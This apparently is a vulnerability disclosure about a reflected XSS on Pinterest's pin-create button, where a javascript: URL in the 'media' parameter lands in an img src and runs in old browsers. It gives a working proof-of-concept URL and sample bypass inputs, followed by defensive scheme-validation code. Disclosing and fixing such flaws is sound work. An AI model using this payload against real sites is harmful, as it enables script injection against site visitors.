Exploiting XSS via an Old-Browser Flaw on Pinterest.com

The flaw is an image XSS using the javascript: directive, affecting the following browsers:
[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02].
Although newer browsers have already patched this issue, it is still a security flaw.
According to research published at http://www.ie6countdown.com/:
6.1% of the world's population still uses IE6
22.2% of the population in China still uses IE6

The reflected XSS is located here:
pinterest.com/pin/create/button/?&media=javascript:alert(1)
The value of the 'media' parameter is inserted into the img src:

<img src="javascript:alert(1)" class="pinPreviewImg" style="">

Hence the JavaScript will be executed in the affected browsers.
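One way to close this regardless of which browser the visitor uses is to validate the scheme of 'media' on the server before it reaches the img src. The sketch below is an added example, not Pinterest's code; the function names, the http/https allow-list and the fallback tag are assumptions.

```javascript
// Added example: hypothetical server-side handling of the `media` parameter.
// Names and the allow-list are assumptions, not taken from Pinterest.
const ALLOWED_SCHEMES = new Set(['http:', 'https:']);

// Returns a normalized absolute URL if `media` is an http(s) URL, else null.
function safeImageSrc(media) {
  if (typeof media !== 'string' || media.length === 0) return null;
  let url;
  try {
    // The WHATWG URL parser trims leading/trailing spaces and control
    // characters, drops tabs/newlines and lowercases the scheme, so
    // " JaVaScRiPt:" and "java\tscript:" are both seen as "javascript:".
    url = new URL(media);
  } catch (e) {
    return null; // relative or unparseable values are rejected
  }
  if (!ALLOWED_SCHEMES.has(url.protocol)) return null;
  return url.href;
}

// Escape a value for use inside a double-quoted HTML attribute.
function escapeAttr(value) {
  return value.replace(/&/g, '&amp;').replace(/"/g, '&quot;')
              .replace(/</g, '&lt;').replace(/>/g, '&gt;');
}

// Build the preview tag; emit no src at all when validation fails.
function renderPreview(media) {
  const src = safeImageSrc(media);
  if (src === null) return '<img class="pinPreviewImg" alt="">';
  return `<img src="${escapeAttr(src)}" class="pinPreviewImg" style="">`;
}

// Constructed sample inputs (not captured traffic).
const samples = [
  'javascript:alert(1)',
  ' JaVaScRiPt:alert(1)',
  'java\tscript:alert(1)',
  'data:image/svg+xml,<svg/>',
  'https://example.com/a.png',
];
for (const s of samples) console.log(JSON.stringify(s), '->', renderPreview(s));
```

Only the last sample produces a tag with a src attribute; the others fall back to the empty preview.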
